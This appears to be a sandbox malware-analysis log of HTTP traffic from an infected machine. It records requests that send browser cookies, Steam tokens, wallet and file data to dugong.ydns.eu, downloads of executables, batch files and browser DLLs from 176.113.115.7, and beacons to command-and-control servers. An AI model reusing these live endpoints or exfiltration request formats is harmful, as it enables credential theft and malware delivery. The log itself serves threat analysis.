0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 79 35 30 65 48 51 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 65 79 4a 70 5a 43 49 36 4d 53 77 69 63 6d 56 7a 64 57 78 30 49 6a 70 37 49 6d 4e 76 62 32 74 70 5a 58 4d 69 4f 6c 74 64 66 58 30 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 2d 2d 0d 0a | Data Ascii: ------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lXy50eHQ=------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="file"eyJpZCI6MSwicmVzdWx0Ijp7ImNvb2tpZXMiOltdfX0=------GHCAAAAKJJDAKECBGIJE--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----AECAKECAEGDHIECBGHII | Host: dugong.ydns.eu | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 41 45 43 41 4b 45 43 41 45 47 44 48 49 45 43 42 47 48 49 49 2d 2d 0d 0a | Data Ascii: ------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------AECAKECAEGDHIECBGHIIContent-Disposition: form-data; name="file"------AECAKECAEGDHIECBGHII--
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 30 35 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111050101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: GET /test/am_no.bat HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 30 36 30 31 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111060121&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF | Host: dugong.ydns.eu | Content-Length: 363 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a | Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="file"------DAKEHIJJKEGIDHIEHDAF--
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 31 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111180101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/freebl3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: GET /mine/random.exe HTTP/1.1 | Host: 176.113.115.7 | Connection: Keep-Alive
                                                Source: global traffic | HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/mozglue.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/msvcp140.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/nss3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/softokn3.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: GET //kj2h34kj23h4/vcruntime140.dll HTTP/1.1 | Host: dugong.ydns.eu | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: 176.113.115.6 | Content-Length: 32 | Cache-Control: no-cache | Data Raw: 64 31 3d 31 30 31 31 31 31 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 | Data Ascii: d1=10111190101&unit=246122658369
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 154 | Cache-Control: no-cache | Data Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 | Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----IECFHDBAAECAAKFHDHII | Host: dugong.ydns.eu | Content-Length: 1067 | Connection: Keep-Alive | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE | Host: dugong.ydns.eu | Content-Length: 267 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 2d 2d 0d 0a | Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="message"wallets------HIIIDAKKJJJKKECAKKJE--
                                                Source: global traffic | HTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1 | Content-Type: multipart/form-data; boundary=----JDBGHIIDAECBFIDHIIDG | Host: dugong.ydns.eu | Content-Length: 265 | Connection: Keep-Alive | Cache-Control: no-cache | Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 42 47 48 49 49 44 41 45 43 42 46 49 44 48 49 49 44 47 2d 2d 0d 0a | Data Ascii: ------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------JDBGHIIDAECBFIDHIIDGContent-Disposition: form-data; name="message"files------JDBGHIIDAECBFIDHIIDG--
                                                Source: global traffic | HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1 | Host: 176.113.115.7
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDHJEBFBFHJECAKFCAAHost: dugong.ydns.euContent-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 48 4a 45 42 46 42 46 48 4a 45 43 41 4b 46 43 41 41 2d 2d 0d 0a Data Ascii: ------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GHDHJEBFBFHJECAKFCAAContent-Disposition: form-data; name="file"------GHDHJEBFBFHJECAKFCAA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIJJKKFHIEHJKECGCGCHost: dugong.ydns.euContent-Length: 123223Connection: Keep-AliveCache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJEGCGDGHCBFHIDHDAAHost: dugong.ydns.euContent-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 45 47 43 47 44 47 48 43 42 46 48 49 44 48 44 41 41 2d 2d 0d 0a Data Ascii: ------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------JJJEGCGDGHCBFHIDHDAAContent-Disposition: form-data; name="message"ybncbhylepme------JJJEGCGDGHCBFHIDHDAA--
                                                Source: global trafficHTTP traffic detected: POST //gtthfbsb2h.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEBAFCBKFIDGCAKKKFCHost: dugong.ydns.euContent-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 31 32 64 33 66 62 62 66 30 65 39 63 64 31 39 30 63 34 30 30 35 32 36 32 61 36 38 31 30 37 39 65 36 32 39 30 64 33 64 36 65 32 34 32 37 31 35 39 34 34 64 65 66 66 63 38 36 66 38 61 30 36 33 37 64 32 64 39 38 38 38 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 43 2d 2d 0d 0a Data Ascii: ------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="token"b12d3fbbf0e9cd190c4005262a681079e6290d3d6e242715944deffc86f8a0637d2d9888------IIEBAFCBKFIDGCAKKKFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIEBAFCBKFIDGCAKKKFC--
                                                Source: global trafficHTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: cobolrationumelawrtewarms.comContent-Length: 154Cache-Control: no-cacheData Raw: 72 3d 45 32 46 37 32 33 38 36 45 34 32 41 46 41 34 46 33 36 37 45 43 34 30 43 34 38 32 43 37 32 33 32 46 37 34 38 45 32 39 38 46 43 36 34 31 36 44 30 38 39 33 34 30 39 30 36 41 32 45 42 46 39 36 31 30 32 37 39 34 41 46 41 31 37 45 34 43 41 44 43 33 44 44 42 45 30 45 41 42 42 46 45 39 38 32 38 45 43 45 46 34 41 34 46 46 31 33 44 35 34 39 32 32 36 41 30 36 43 46 41 31 39 39 38 34 42 44 31 44 45 35 42 42 32 30 31 30 41 30 32 42 44 46 45 42 33 32 33 30 43 43 34 Data Ascii: r=E2F72386E42AFA4F367EC40C482C7232F748E298FC6416D089340906A2EBF96102794AFA17E4CADC3DDBE0EABBFE9828ECEF4A4FF13D549226A06CFA19984BD1DE5BB2010A02BDFEB3230CC4
                                                Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: dugong.ydns.eu | Connection: Keep-Alive | Cache-Control: no-cache
                                                Source: global traffic | HTTP traffic detected: POST /3ofn3jf3e2ljk/index.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | Host: cobolrationumelawrtewarms.com | Content-Length: 4 | Cache-Control: no-cache | Data Raw: 73 74 3d 73 | Data Ascii: st=s
